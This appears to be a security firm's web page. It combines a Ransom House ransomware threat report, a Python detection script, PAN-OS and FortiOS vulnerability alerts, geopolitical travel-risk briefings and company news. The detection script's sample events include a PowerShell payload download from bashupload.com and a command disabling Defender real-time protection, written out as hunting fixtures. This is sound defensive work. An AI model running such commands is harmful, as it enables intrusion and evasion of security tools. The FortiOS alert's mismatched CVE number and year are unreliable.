A Comprehensive Analysis of a Formidable Ransomware Threat

Unmasking “Ransom House”


Overview

A detailed investigation conducted by Solace Cyber into the tactics, techniques, and procedures used by the “Ransom House” ransomware group reveals a sophisticated approach to cyber attacks, including initial network access through compromised credentials, extensive use of tools like PowerShell and Mimikatz, and strategic persistence mechanisms.

As well as insights into the group’s tactics and operations, this report offers preventative recommendations that can help you better understand and manage your organisation’s risk profile.

Report Findings

Extensive experience in the investigation of attacks by the “Ransom House” ransomware group has provided a comprehensive understanding of the tactics, techniques, and procedures adopted by this threat actor during their attacks.

In terms of initial (network) access, the threat actor is known to make use of compromised credentials to access the network through RDS gateways, with cyber threat intelligence linking the IP addresses used by the threat actor to those used by numerous other ransomware/malware-related affiliates, such as “Medusa” and “Meduza Stealer”. In terms of compromised account usage, “Ransom House” will leverage any available credentials to pursue initial access, irrespective of whether these are local or administrative-level accounts, particularly where weak ingress points, such as an RDS gateway, are concerned. Although the threat actor routinely installs other RMM tools to maintain network access, where the initial attack vector has not been identified and closed, the threat actor has been seen to continue using the original method of access.

In terms of command and control and the ability to maintain a route into the network, “Ransom House” are known to implement multiple methods – as a means of redundancy – to maximise their chances of maintaining access. Analysis of numerous breaches has identified a number of tools used as persistence mechanisms, including “resocks” and “TeamViewer”, with the threat actor installing these across different servers within the compromised network. Regarding the introduction of such tools into the compromised network, it has been determined from forensic analysis that the threat actor will utilise PowerShell to download tools from file sharing sites, including “hxxp://bashupload.com”, where the required files are uploaded, and a specific link generated to facilitate downloading as and when required.

To support efforts around credential access, the threat actor is known to make extensive use of the credential dumping utility “Mimikatz”. Forensic investigation and timeline analysis have established that, prior to undertaking this attack phase, the threat actor will deploy defence evasion techniques, including disabling Defender “Real Time Protection”, to ensure the deployment of credential access tooling is not detected and blocked by antivirus software. Additional identified credential access techniques include the execution of bespoke PowerShell scripts targeting specific systems, including Veeam backup servers; these scripts have been reverse engineered and shown to retrieve and decrypt passwords from the targeted servers. Once this objective has been achieved, the threat actor has been seen to use the harvested credentials for accounts with elevated permissions, such as administrator accounts, to advance lateral movement through the target environment. Following on from this, use of network discovery tools is commonplace, with “Advanced IP Scanner” routinely identified across an infected environment. The threat actor has also been observed interrogating browsers to obtain IP addresses for ESXi hosts and vSphere datastores, to advance their understanding of the victim network and identify the location of key servers for ransomware deployment.

Regarding data collection, extensive analysis of “Ransom House” ransomware attacks has identified the use of “7-zip” as a key tool to support data exfiltration. The threat actor will install this into non-standard directory locations, such as “Pictures” and “Documents”, in an attempt to obfuscate this activity and prevent detection. Allied to the use of “7-zip” is the use of PowerShell to execute commands, such as the aforementioned downloading of files, the installation of modules, changing of passwords, and ransomware execution. By way of example, the following commands have been identified in several attacks on virtualised environments:
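As an added example (not part of Solace’s report), the following Python scan encodes the tradecraft described above as detection rules and runs them over a handful of constructed Windows telemetry records (PowerShell script-block events and Sysmon process/file events). The hostnames, event shapes and the bashupload.com path are assumptions; the behaviours matched are only those the report names.

```python
"""Hunt for the Ransom House tradecraft described above in Windows telemetry.

Added example, not code from the report: event shapes, hostnames and the
bashupload path are constructed. The rules encode only behaviours the report
describes (PowerShell downloads from bashupload.com, Defender real-time
protection disabled, 7-zip run from Pictures/Documents, Advanced IP Scanner,
resocks/TeamViewer appearing on servers).
"""
import re
from typing import Dict, List, Tuple

# (rule name, Unified Kill Chain phase, pattern applied to the event message)
RULES: List[Tuple[str, str, re.Pattern]] = [
    ("powershell_download_bashupload", "Through",
     re.compile(r"(?i)(Invoke-WebRequest|iwr|Start-BitsTransfer|DownloadFile|curl)"
                r".*bashupload\.com")),
    ("defender_realtime_disabled", "Through",
     re.compile(r"(?i)Set-MpPreference.*-DisableRealtimeMonitoring\s+\$?true")),
    ("7zip_in_user_folder", "Out",
     re.compile(r"(?i)\\(Pictures|Documents)\\[^\s]*7z(g|a)?\.exe")),
    ("advanced_ip_scanner", "Through",
     re.compile(r"(?i)advanced_ip_scanner(_console)?\.exe")),
    ("remote_access_tool_dropped", "Through",
     re.compile(r"(?i)\b(resocks|TeamViewer)\b")),
]

# Constructed sample events: (source, host, message). 4104 = PowerShell script
# block logging, Sysmon 1 = process creation, Sysmon 11 = file created.
SAMPLE_EVENTS: List[Tuple[str, str, str]] = [
    ("PowerShell/4104", "DC01",
     r"Invoke-WebRequest -Uri hxxp://bashupload.com/AbCdE/payload.bin -OutFile C:\Users\Public\payload.bin"),
    ("PowerShell/4104", "VEEAM01", r"Set-MpPreference -DisableRealtimeMonitoring $true"),
    ("Sysmon/1", "FS02",
     r"Image: C:\Users\svc_backup\Pictures\7z.exe CommandLine: 7z.exe a D:\export.7z D:\share"),
    ("Sysmon/1", "WS17",
     r"Image: C:\Program Files (x86)\Advanced IP Scanner\advanced_ip_scanner.exe"),
    ("Sysmon/11", "SRV03", r"TargetFilename: C:\Windows\Temp\resocks.exe"),
    ("Sysmon/1", "WS17", r"Image: C:\Windows\System32\notepad.exe"),
]


def scan(events):
    """Return one hit per (rule, event) pair, keeping the host for triage."""
    hits = []
    for source, host, message in events:
        for name, phase, pattern in RULES:
            if pattern.search(message):
                hits.append({"rule": name, "phase": phase, "host": host,
                             "source": source, "message": message})
    return hits


def hosts_by_phase(hits):
    """Group affected hosts by kill-chain phase so responders can see scope."""
    out: Dict[str, List[str]] = {}
    for h in hits:
        out.setdefault(h["phase"], [])
        if h["host"] not in out[h["phase"]]:
            out[h["phase"]].append(h["host"])
    return out


if __name__ == "__main__":
    for h in scan(SAMPLE_EVENTS):
        print(f"[{h['phase']}] {h['rule']:32} {h['host']:8} {h['source']}")
    print(hosts_by_phase(scan(SAMPLE_EVENTS)))
```

Each hit carries the Unified Kill Chain phase used later in this report, so hosts_by_phase() shows at a glance which hosts carry “Through” activity (tooling, evasion, discovery) and which are being used for “Out” staging with 7-zip. In a real deployment the same fields would be read from a SIEM query rather than an inline list.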

It has been seen that the threat actor will stage on the domain controller to deploy encryption across VMware datastores. In terms of encryptors, recent “Ransom House” attacks have seen the detonation of the “emario” encryptor against virtual disks (files renamed with the “.emario” extension), with a ransom note entitled “How To Restore Your Files.txt”. The “White Rabbit” encryptor has also been identified, executed against domain controllers. File extensions are modified with underscores, e.g., a “.docx” file would become “.doc_”, with ransom notes named “!!READ_ME!!” placed across the file system.

Unified Kill Chain Overview

Using the Unified Kill Chain model, the attack can be split into three distinct phases:

  1. In: The method(s) used by the attackers to gain access to the network.
  2. Through: The method(s) used by the attackers to navigate through the network.
  3. Out: The method(s) used by the threat actor to use network access to monetise the attack.

Timeline

Indicators of Compromise

The following table contains a combined view of relevant indicators of compromise (IOCs) found during the forensic analysis undertaken by Solace Global Cyber.

Preventative Recommendations

Solace Global Cyber has created a complimentary risk assessment that enables any UK organisation to understand its risk profile against ransomware.

Solace Global – Cyber Risk Assessment

General Guidance:

  • Endpoint Detection & Response (EDR) technologies, correctly set up in anti-evasion mode with anti-evasion techniques enabled. These need to be monitored 24/7 by specialists who can react within short SLA times.
  • Anti-virus and EDR will be evaded by these groups if not set up correctly; ask your provider how your existing solution will prevent ransomware groups from evading or turning off these technologies. Monitor the status of your AV or EDR agents: devices that are turned off or not reporting in are an early indicator of ransomware.
  • Monitor your AV alarms: when Solace runs forensics there are many IOCs detected even where the AV has been inhibited. Don’t simply trust your MSP and suppliers; always challenge them to show that you are truly being protected.
  • Backup: ensure your backups are air-gapped and immutable, and test that backups are happening at the correct frequency.
  • Multi-Factor Authentication (MFA) on email and all remote access points.
  • Network monitoring, either via a SIEM or a suitable technology for your specific firewall.
  • Use a single remote access tool so that any new ones are easier to detect.
  • Solace also recommends signing up to the NCSC Early Warning System, which is free, to complement your security posture.
  • Be ready for the worst case and have a business incident response plan so that the organisation as a whole is prepared for such an attack.
  • Segment your network to limit and control risks.
  • Ensure strong passwords are in use.
  • Ensure your estate is patched and End of Life systems are not in play.
  • Regular phishing training for staff. Help staff become the strongest line of defence by building the right cyber culture.

If you are experiencing a cyber attack from this group, please contact Solace Global Cyber and we will provide you with complimentary guidance and technologies to assist you.

Experiencing a Cyber Attack?

Solace Cyber can provide complimentary guidance and technologies to assist you.

    Slovak Leader Fico Survives Assassination Attempt

    Slovak Prime Minister Robert Fico is in a serious but stable condition following a suspected assassination attempt. The attack occurred on May 15 in the small town of Handlova, where Fico was meeting supporters outside a cultural centre. He was shot multiple times and immediately rushed to F. D. Roosevelt University Hospital in Banska Bystrica. After undergoing a five-hour surgery, he is currently in intensive care.

    The alleged suspect, a 71-year-old writer and political activist, was detained at the scene. Authorities are investigating the motive behind the attack, which is widely believed to be politically motivated.

    Fico, who secured office in October 2023 after a divisive campaign, has been a polarising figure. He is one of the few European leaders advocating for closer ties with Russia and has called for an end to the EU’s military support for Ukraine. Under his leadership, Slovakia has halted all arms deliveries to Kyiv.

    Fico’s government has made controversial moves, including a proposal to abolish the country’s public broadcaster and weaken anti-corruption laws. These actions have sparked fears about media independence and democracy in Slovakia, leading to widespread protests. Some believe these tensions contributed to the assassination attempt, with Fico’s ruling SMER party blaming false narratives from the opposition.

    The attack on Prime Minister Fico is expected to lead to heightened security measures across Slovakia. In the long term, this incident might be used to justify suppressing dissent and pushing through more contentious government proposals. Additionally, Russian-affiliated social media accounts have been spreading information suggesting Ukrainian or NATO involvement, with some posts inciting violence against European officials.

    Former Russian President Dmitry Medvedev has hinted that the attack could be linked to Fico’s stance on Russia. While the risk of terrorism in Slovakia remains low, there is a realistic possibility of targeted violence and harassment against pro-EU Slovakian officials in the coming weeks.



    2024 Intelligence Forecast: The Populist Wave and Polarisation in Europe in 2024

    The rise of both far-right and far-left political parties in Europe in recent years has significantly complicated and energised the political landscape in the continent. This trend is expected to persist into 2024.


    Nakba Day 2024

    Anticipated Disruption Across North Africa, Europe and North America

    Intelligence cut off time 10:00 GMT 14th of May 2024

    This Wednesday, May 15, commemorates the 76th anniversary of the Nakba, an Arabic term meaning “catastrophe.” It signifies the expulsion and forced displacement of around 750,000 Palestinian Arabs during the 1947-1949 Palestine War, following the adoption of the UN’s Partition Plan for Palestine, which ended British mandate rule over the territory. This event is profoundly significant historically, marking the onset of the Palestinian diaspora and a pivotal moment in the formation of Palestinian national identity, which persists nearly a century later.

    This year, the significance of the commemoration will be amplified due to the ongoing war in the Gaza Strip. The conflict has reached a critical juncture, especially with the recent deployment of Israeli troops into Rafah on May 6th. The conflict, which followed a surprise attack launched by the Gaza Strip-based Hamas terror group on 7 October, and resulted in the killing of approximately 1,200 Israelis, mostly civilians, has entered its seventh month. During this time, over 35,000 Palestinians, mostly civilians, have lost their lives, and nearly two million have been displaced internally. Gaza is grappling with severe famine, a near-total collapse of infrastructure, and extensive destruction of local housing.

    This year’s Nakba Day is expected to spark extensive protests and disruptions, especially in North Africa, Europe, and North America. While some events may be sanctioned by authorities or even state-sponsored, there’s a significant risk of clashes with security forces. In regions with substantial pro-Israel support, tensions may escalate between pro-Palestine demonstrators and counter-protesters, potentially leading to property damage targeting individuals associated with either side.

    Universities are expected to be significant focal points for civil unrest. Across the globe, student occupations and protests have occurred in various academic institutions, notably in France, the United States, and the Netherlands. In Tel Aviv, authorities recently prohibited a planned Nakba commemoration event, potentially triggering anti-government demonstrations and clashes in the city. Student movements, while typically localised, can disrupt city centres in major urban areas.

    The risk of terrorism, particularly from self-radicalised individuals or “lone wolves,” presents a significant threat, especially in densely populated urban areas. These lone actors may target large gatherings or individuals and locations with simple weapons like knives or occasionally light firearms. Vehicle attacks are also a possibility, although their effectiveness varies due to anti-vehicle barriers in many city centres.

    While organised terror group attacks are less common, they are not impossible. For instance, in Alexandria, Egypt, on May 7th, a Jewish businessman was killed by a group named ‘Vanguards of the Liberation – the Martyrs of Mohamed Salah’, linked to an incident involving an Egyptian police officer killing three Israel Defense Forces (IDF) soldiers in 2023. Attacks by groups are often more sophisticated and may involve improvised explosive devices (IEDs), but they also have a higher chance of being thwarted by authorities compared to lone wolf attacks.

    Nakba Day-related disruptions are expected to primarily impact large urban centres in countries that have seen significant pro-Palestine protests. These disruptions are likely to concentrate around government or academic institutions, limiting their scope. Avoiding these areas unless necessary should mitigate physical risks.

    However, traffic disruptions, potentially affecting various modes of transportation, are less predictable and could have more widespread effects. While disruptions to airports and seaports are unlikely, protesters may attempt to block roads, particularly around targeted buildings and main traffic arteries leading into urban centres. Even brief disruptions could have lasting effects throughout the day.

    To minimise such risks, it’s recommended to schedule travel outside of rush hour and to plan entry into large cities prone to protests for early morning hours. If traveling through city centres is unavoidable, consider alternative routes away from likely protest areas and avoid public transportation.

    It’s crucial to stay informed through official channels regarding potential protests, disruptions, and violence. Familiarise yourself with local emergency contacts, including nearby police stations and emergency rooms. When planning business operations, establish clear communication procedures such as two-way messaging networks and GPS tracking to reduce risks to people and assets.

    Additionally, having failover systems and strategic redundancies in place can mitigate the impact of severe localised disruptions on primary business operations, although such scenarios are unlikely.


    Solace Global Risk is a leading provider of comprehensive risk management solutions, serving clients globally with a commitment to excellence. Our team of seasoned experts empowers organisations to navigate complex risk landscapes with confidence and resilience.

    Journey Risk Management

    Your duty of care doesn’t end the moment your people set foot in their destination – and neither does ours.

    From transfers to ongoing security and emergency evacuations, our travel risk services always have you covered. 

    Arm yourself with the knowledge to avoid a potential threat from turning into a crisis. Intelligence advisories give you tailored reports to anticipate possible disruptions, mitigate risk and help you make well-informed decisions, faster.

    Give your people peace of mind when they travel for work, so they remain focused on the job at hand. We mitigate risks, manage incidents if they occur, and support your people with security advice or help in a crisis. 



      US Expansion for Solace Global Risk

      Solace Global Risk announces further expansion into the United States market and proudly appoints Brent Borawski as Vice President of Sales and Business Strategy.


      Brent Borawski brings 25 years of invaluable experience in the Insurance and Risk Management sector and has already seen a surge in requests from US organizations that require a more tailored approach to risk management.

      Brent comments that “Many organizations are rightfully asking ‘what happens if we are impacted, and are we truly ready to react in a crisis?’

      He goes on to say “The sentiment amongst leaders in security is shifting…

      …Resources and budgets are tightening, all while requirements increase due to higher levels of global instability. Now many are assessing whether their current suppliers are providing the best value and innovative technology that truly align with their processes.

      Gone are the days when integrating a platform is simply a box-ticking exercise for duty of care obligations. Clients expect a better level of service and have the assurance providers can go the extra mile in a crisis.”

      This strategic move marks a significant milestone for Solace Global Risk and underscores its unwavering commitment to delivering exceptional customer service that surpasses expectations.



      Emily Roberts

      Managing Director, Solace Global Risk

      “We are thrilled to bring Solace’s unique vision and solutions to the US market.

      With 14 years of experience serving clients across various industries, we have witnessed firsthand the increasing demand for tailored solutions to mitigate risks and ensure business continuity. Our entry into the US market underscores our commitment to meeting the unique needs of American businesses by providing innovative, client-focused risk management services. 

      Whether you are navigating geopolitical uncertainties, ensuring the safety of your personnel during travel, or safeguarding your assets against emerging threats, Solace Global is here to support you every step of the way. 

      We are poised to collaborate and provide expertise to US-based organizations seeking advanced risk management solutions and unparalleled support.”


      Solace Global Risk is a leading provider of comprehensive risk management solutions, serving clients globally with a commitment to excellence. With a dedicated US presence and a team of seasoned experts, Solace Global Risk empowers organisations to navigate complex risk landscapes with confidence and resilience.

      Journey Risk Management

      Diligent in-country travel security

      Be one step ahead to prevent a crisis

      Travel with confidence



      Solace Global
      418 Broadway
      #5011 Albany
      NY 12207



        CVE-2024-3400

        Cyber Security Alert: GlobalProtect Gateway Zero-Day Vulnerability


        Overview: Palo Alto has announced a critical zero-day vulnerability that is actively being used in the wild.

        Threat Name: CVE-2024-3400

        Risk Factor: Critical

        Date: April 2024


        Solace Cyber security specialists can assist with updating your firewall to the latest version.

        What We Know

        CVE-2024-3400 represents a critical command injection vulnerability impacting the GlobalProtect Gateway functionality within PAN-OS. This flaw could be exploited by a remote, unauthenticated attacker to execute arbitrary code on a targeted firewall, granting them root privileges. The vulnerability has been categorised as critical as it poses a significant risk.

        What Has Palo Alto Said?

        Palo Alto Networks has acknowledged the issue and is working on a patch for CVE-2024-3400. Fixes are starting to become available. Not all versions of PAN-OS have a patch yet, so the advice is to keep an eye on the official Palo Alto Networks site.

        Palo Alto Networks has also acknowledged that it’s “aware of a limited number of attacks that leverage the exploitation of this vulnerability.”

        According to Palo Alto, the issue applies only to firewalls that have the configurations for both GlobalProtect gateway (Network > GlobalProtect > Gateways) and device telemetry (Device > Setup > Telemetry) enabled.

        Recommendations For Navigating The Vulnerability

        When a vulnerability is identified, it’s crucial to take swift action to mitigate any potential risks. Specifically, for the following PAN-OS versions:

        • PAN-OS earlier than 11.1.2-h3
        • PAN-OS earlier than 11.0.4-h1
        • PAN-OS earlier than 10.2.9-h1

        It’s highly recommended to prioritise patching as soon as the updates are released. These patches are vital for bolstering the security of your systems and safeguarding against potential exploitation.

        As an interim measure, disabling device telemetry can serve as a temporary workaround until an official patch is made available. This step can help minimise exposure to vulnerabilities while awaiting the official fix.

        Remaining vigilant is key. Continuously monitor official communications from Palo Alto Networks for any updates regarding the vulnerability and subsequent patches or mitigations. As soon as updates are released, promptly apply them to your systems to ensure optimal security posture.

        It’s imperative to update your firewall to the latest version at the earliest opportunity. Solace Cyber stands ready to assist with this process, ensuring your firewall is promptly updated to the most recent version, thereby fortifying your defenses against potential threats.

        Need support?

        Solace Cyber security specialists can assist with updating your firewall to the latest version

          Announcement from Solace Global

          It is with great sadness that we confirm that seven humanitarian aid workers, including three security personnel from Solace Global, were tragically killed on Monday evening following a strike on World Central Kitchen’s humanitarian mission, delivering food aid to those in need in Gaza. 

          Words cannot express the depth of sympathy that we feel for the families, friends, colleagues and loved ones of those who died. We are working closely to support them at this difficult time. 

          We are humbled by the bravery of the men and women working in such complex environments to deliver vital aid, and pay tribute to those that lost their lives on Monday. Those who knew John, James and James have expressed pride for them enabling humanitarian efforts. 

          We are committed to supporting the families and loved ones of those who died, and remain dedicated to the continuation of services for all of our clients.

          Solace Global at ASIS Europe 2024

          We are excited to announce that we will be exhibiting at ASIS Europe 2024 in Vienna, where we will be showcasing our risk management solutions aimed at navigating the complexities of today’s global security landscape and building business resilience.

          We are excited to exhibit alongside top security firms and engage with esteemed professionals and emerging leaders in the industry.

          Visit our stand B8 to connect with our experts, learn more about our industry leading risk management platform, Solace Secure, and find out how Solace Global can help you strengthen your business resilience.


          Event details

          When

          March 21-22, 2024

          Where

          Vienna, Austria



          Emily Roberts

          Managing Director, Solace Global Risk

          “In a world marked by geopolitical uncertainties and evolving threats, it’s imperative for businesses to prioritise resilience. This means not only having robust security measures in place but also the agility to adapt and respond swiftly to emerging challenges. At Solace Global, we recognise the growing demand from European organisations for comprehensive security solutions tailored to their specific needs.”


          Connect with us at ASIS Europe 2024


            CVE-2024-21762

            Cyber Security Alert: Fortinet Warns of Critical FortiOS SSL VPN Flaw


            Overview: Fortinet Warns of Critical FortiOS SSL VPN Flaw Likely Under Active Exploitation. Immediate action required.

            Threat Name: CVE-2023-20198

            Risk Factor: Critical

            Date: 9th Feb 2024


            Solace Cyber security specialists can assist with updating your firewall to the latest version.

            What We Know

            On February 8, 2023, Fortinet issued a notice addressing a potentially exploited vulnerability in the wild. This vulnerability, found in the SSL VPN component, is classified as a pre-authentication vulnerability, with a critical severity rating of 9.6 CVSSv3. The identified flaw could enable a remote attacker to authenticate remotely by employing carefully crafted HTTP requests. Subsequently, the attacker may execute arbitrary code or commands, as reported by Fortinet.

            What Has Fortinet Said About The Vulnerability?

            Fortinet has emphasised that the only viable solution is to disable the SSL VPN entirely; opting to deactivate webmode is not considered a valid workaround. Urgent action is advised to promptly patch this vulnerability.

            The affected versions and recommended solutions for FortiOS are as follows:

            • FortiOS 7.6: not affected; no action is required (Not Applicable).
            • FortiOS 7.4: versions 7.4.0 through 7.4.2 are affected; upgrade to 7.4.3 or above.
            • FortiOS 7.2: versions 7.2.0 through 7.2.6 are affected; upgrade to 7.2.7 or above.
            • FortiOS 7.0: versions 7.0.0 through 7.0.13 are affected; upgrade to 7.0.14 or above.
            • FortiOS 6.4: versions 6.4.0 through 6.4.14 are affected; upgrade to 6.4.15 or above.
            • FortiOS 6.2: versions 6.2.0 through 6.2.15 are affected; upgrade to 6.2.16 or above.
            • FortiOS 6.0: all versions are affected; migrate to a fixed release.
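The following added Python example (not vendor code) turns the version thresholds from both alerts on this page into a check: the PAN-OS fixed builds 11.1.2-h3, 11.0.4-h1 and 10.2.9-h1 from the CVE-2024-3400 alert earlier on the page, together with its gateway-plus-telemetry exposure condition, and the FortiOS affected ranges listed above. The “-hN” hotfix suffix is parsed so that 10.2.9 sorts below 10.2.9-h1; release trains the page does not name are reported as not covered rather than guessed. The version strings fed in are constructed.

```python
"""Check a firewall's reported version against the two advisories on this page.

Added example, not vendor code. The thresholds are exactly those the page
lists for PAN-OS (CVE-2024-3400: fixed in 11.1.2-h3, 11.0.4-h1, 10.2.9-h1;
exposed only when GlobalProtect gateway and device telemetry are both enabled)
and for FortiOS (affected ranges per release train). Trains the page does not
name are reported as not covered rather than guessed.
"""
import re
from typing import Dict, Tuple

# major, minor, maintenance, hotfix ("-hN" suffix; 0 when absent)
Version = Tuple[int, int, int, int]


def parse_version(text: str) -> Version:
    m = re.fullmatch(r"\s*(\d+)\.(\d+)\.(\d+)(?:-h(\d+))?\s*", text)
    if not m:
        raise ValueError(f"unrecognised version string: {text!r}")
    major, minor, maint, hotfix = m.groups()
    return int(major), int(minor), int(maint), int(hotfix or 0)


# PAN-OS: first fixed build per train, from the page.
PANOS_FIXED: Dict[Tuple[int, int], str] = {
    (11, 1): "11.1.2-h3",
    (11, 0): "11.0.4-h1",
    (10, 2): "10.2.9-h1",
}


def panos_status(version: str, gp_gateway_enabled: bool, telemetry_enabled: bool) -> str:
    v = parse_version(version)
    fixed = PANOS_FIXED.get(v[:2])
    if fixed is None:
        return "not_in_advisory_list"
    if v >= parse_version(fixed):
        return "patched"
    # Below the fix. The page says the issue applies only with gateway and
    # telemetry both enabled; disabling telemetry is an interim workaround,
    # not a replacement for the patch.
    if gp_gateway_enabled and telemetry_enabled:
        return "vulnerable_exposed"
    return "vulnerable_not_exposed"


# FortiOS: (first affected, last affected, action) per train, from the page.
FORTIOS_AFFECTED: Dict[Tuple[int, int], Tuple[Version, Version, str]] = {
    (7, 4): (parse_version("7.4.0"), parse_version("7.4.2"), "upgrade to 7.4.3 or above"),
    (7, 2): (parse_version("7.2.0"), parse_version("7.2.6"), "upgrade to 7.2.7 or above"),
    (7, 0): (parse_version("7.0.0"), parse_version("7.0.13"), "upgrade to 7.0.14 or above"),
    (6, 4): (parse_version("6.4.0"), parse_version("6.4.14"), "upgrade to 6.4.15 or above"),
    (6, 2): (parse_version("6.2.0"), parse_version("6.2.15"), "upgrade to 6.2.16 or above"),
}


def fortios_status(version: str) -> Tuple[str, str]:
    v = parse_version(version)
    train = v[:2]
    if train == (7, 6):
        return "not_affected", "no action required"
    if train == (6, 0):
        return "affected", "migrate to a fixed release"
    rng = FORTIOS_AFFECTED.get(train)
    if rng is None:
        return "unknown", "train not covered by the advisory list"
    first, last, action = rng
    if first <= v <= last:
        return "affected", action
    return "not_affected", "running a fixed release"


if __name__ == "__main__":
    # Constructed inputs for illustration only.
    print(panos_status("10.2.8", gp_gateway_enabled=True, telemetry_enabled=True))
    print(panos_status("11.1.2-h3", gp_gateway_enabled=True, telemetry_enabled=True))
    print(fortios_status("7.4.2"), fortios_status("7.2.7"), fortios_status("6.0.12"))
```

Feeding the inventory export from a firewall management console through these two functions gives a quick list of devices still needing the upgrade; anything that comes back as "not_in_advisory_list" or "unknown" should be checked manually against the vendor advisory rather than treated as safe.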

            What’s The Impact and Implementation Plan?

            The flaw allows an attacker to remotely authenticate using crafted HTTPS requests. According to vuldb.com, technical details are unknown, but an exploit is available.

            Swiftly upgrade your firewall to the most recent update. Solace Cyber is available to help you with the process of updating your firewall to the latest version.

            Need support?

            Solace Cyber security specialists can assist with updating your firewall to the latest version

              Alert Plus: US and UK launch air strikes on Houthi targets in Yemen

              Current Situation of US and UK air strikes in Yemen

              Intelligence cut off time 15:00 GMT 12th of January 2024

              On 11-12 January, US and UK aircraft and warships conducted at least 70 strikes on multiple military targets in Houthi-controlled Yemen. Reports indicate that over 100 precision guided munitions were fired on at least 16 Houthi locations. This includes a military base adjacent to Sanaa airport, a military site near Taiz airport, a Houthi naval base in Hodeidah and military sites in Hajjah governorate. The Houthis stated that five of the group’s fighters were killed in the strikes with six others wounded.

              The US Secretary of Defense, Lloyd J. Austin III, released a statement indicating that targeted strikes were conducted on sites associated with unmanned aerial vehicles (UAVs), ballistic and cruise missiles, and coastal radar and air surveillance capabilities.

              The majority of the firepower came from US jets, with the US having the aircraft carrier USS Dwight D Eisenhower already in the Red Sea, as well as air bases in the region. US Navy warships also fired Tomahawk land attack cruise missiles (LACMs), which are GPS-guided and can be programmed to fly evasively. The UK contributed by sending four RAF Typhoons from Akrotiri, Cyprus, carrying Paveway IV guided bombs.

              Map of US and UK Air Strikes against Houthi’s in Yemen

              In response, the Houthis have stated that they are not deterred by the attacks. The group’s leader, Mohammed al-Bukhaiti, stated that the US and UK would “soon realise” the action was “the greatest folly in their history”. Hezbollah, Hamas, and the Palestinian Islamic Jihad responded by saying that the strikes show Washington and London’s support for Tel Aviv and that the West are now responsible for the subsequent impact on the region’s security. Iran also responded forcefully, expressing that the strikes were a breach of international laws. Saudi Arabia and Jordan did not condemn the attacks but did call for restraint. Several Western nations supported the operation as an attempt to restore the free flow of trade and deter further Houthi attacks.

              Who is Behind The Houthi Movement?

              The Houthi Movement is an Iranian-aligned group that controls much of Yemen after nearly a decade of civil war against a Western-backed and Saudi-led coalition. The two sides are currently observing a tentative ceasefire that officially ended in late 2022 but has remained in place to the current day.

              Following the outbreak of the Hamas-Israel conflict, the Houthis emerged as a strong supporter of the Palestinian Islamist group. The Houthis began attacks on shipping between the Gulf of Aden and the Red Sea in December 2023, claiming to target vessels linked to Israeli persons, businesses, and interests.

              However, this route, which links Europe with Asia and Africa via the Suez Canal, accounts for roughly 15 percent of the world’s shipping traffic. The attacks have forced some shipping companies to limit transits through the waterway, or even cease operations altogether, instead taking the longer route around southern Africa. This has significantly disrupted international commerce, increasing delivery costs and times and stoking fears of global inflation.

              In response to the Houthi attacks, the US launched Operation Prosperity Guardian alongside several allies, which aimed to end the blockade and counter all threats by Houthi forces against international maritime trade. The operation was defensive in nature, destroying only missiles launched at vessels with no pro-active strikes conducted. The Houthis continued to fire at merchant vessels, as well as allied naval vessels, dismissing warnings from Washington and London. Then on 9 January, US and British warships shot down 21 drones and missiles, repelling the largest Houthi attack so far.

              How will UK and US airstrikes in Yemen affect global stability?

              It is highly likely that the Houthis’ largest attack to date, on 9 January, was the trigger that crossed the US-UK threshold for action. While international prices have yet to see a significant impact, Operation Prosperity Guardian was not working as a deterrent. It is highly likely that more extensive, continued Houthi action would force more merchant vessels away from the Red Sea, almost certainly disrupting maritime trade and therefore increasing consumer prices and shortages.

              In the immediate aftermath, the Houthis are highly likely to increase their attacks on commercial and military vessels in the region in retaliation. However, it is likely that their ability to launch missiles and drones has been degraded. Should the Houthis sustain their attacks, it is almost certain that the US and UK will continue their strikes on targets within Yemen. It is also highly likely that the group will be re-designated as a terrorist organisation if they continue. This would have a significant impact on the peace process to end the Yemeni Civil War between the Houthis and the Saudi-led coalition, which has continued to progress despite regional tensions.

              A breakdown of the process would almost certainly see a resumption of hostilities between the two sides, with locations within Saudi Arabia and the United Arab Emirates likely becoming viable targets for the Houthis, as evidenced by their previous attacks.

              Across the Middle East, it is highly likely that the Houthis’ allies and other Iranian proxies will start to act in solidarity with the group. These groups will almost certainly view the attacks as Western support for Israel.

              It is almost certain that Popular Mobilisation Forces (PMF) in Iraq and Syria will continue to target US military bases across the region. It is also likely that the frequency and scale of these attacks will increase considerably. There is a realistic possibility that US military locations that have not been targeted yet in Kuwait, Saudi Arabia, and the UAE, are targeted.

              Hezbollah will likely continue to focus its attacks on Israel; however, an attack on the US cannot be ruled out. While still unlikely, the US and UK strikes on Yemen have increased the likelihood of a wider conflict developing in the Middle East, as well as of the West entering a proxy war with Iran. This eventuality would highly likely take focus away from the conflict in Gaza, almost certainly intensifying the humanitarian situation.

              Travel Risk Advice

              • Avoid all non-essential travel to Yemen.
              • Anyone operating in the region should monitor events from a reliable source in case of a major escalation.
              • Key military and political infrastructure inside Sana’a is very likely to remain a focal point for violence and demonstrations. You should be particularly vigilant in these areas and follow any specific advice from the local security authorities.
              • Avoid US and UK embassies or consulates across the region as these will likely be the epicentres for demonstrations.
              • If air-raid or rocket warning sirens are sounded, seek secure shelter immediately, ideally in a purpose-built shelter. If in a building when sirens are sounded, head to a secure room, stairwell or inner room. Close all windows and doors, stay in shelter for ten minutes after the siren ends.
              • If hostilities resume between the Houthis and the Saudi-led coalition, key civilian and military installations in Saudi Arabia and the UAE will likely become targets. Avoid these locations if not essential.
              • Previous Houthi attacks have targeted major airports. Ensure alternative travel plans have been prepared for, as well as all individuals having comprehensive travel insurance.
              • Mariners in the region should proceed with extreme caution, maintaining contact with port and shipping authorities at all times.
              • Always follow all instructions and orders from security forces. Where possible, avoid areas of active conflict and remain inside a secure location away from windows.
              • Ensure that you always carry personal identification documents. Consider making photocopies of important documents in case of confiscation, theft or loss. Keep these documents separated from the originals.
              • Have emergency contact numbers saved on your phone. These should include the local authorities, medical facilities and any consular support. Ensure that mobile phones are charged in case of any losses in electricity.
              • If caught in the vicinity of a security incident, seek shelter immediately and leave the area if safe to do so. Continue to adhere to all instructions issued by authorities and obey any security cordons in place. 
              • Monitor the Solace Secure platform and trusted local media for relevant updates.



                Solace Cyber Recognised as Assured Service Provider by National Cyber Security Centre

                Solace Cyber, a leading Cyber Security organisation with headquarters in Dorset, has achieved recognition as an Assured Service Provider under the prestigious Cyber Incident Response (Level 2) scheme by the National Cyber Security Centre (NCSC). This accolade positions Solace Cyber among the first in the UK to attain Incident Response accreditation through the scheme, highlighting their commitment to providing high-quality incident response services.

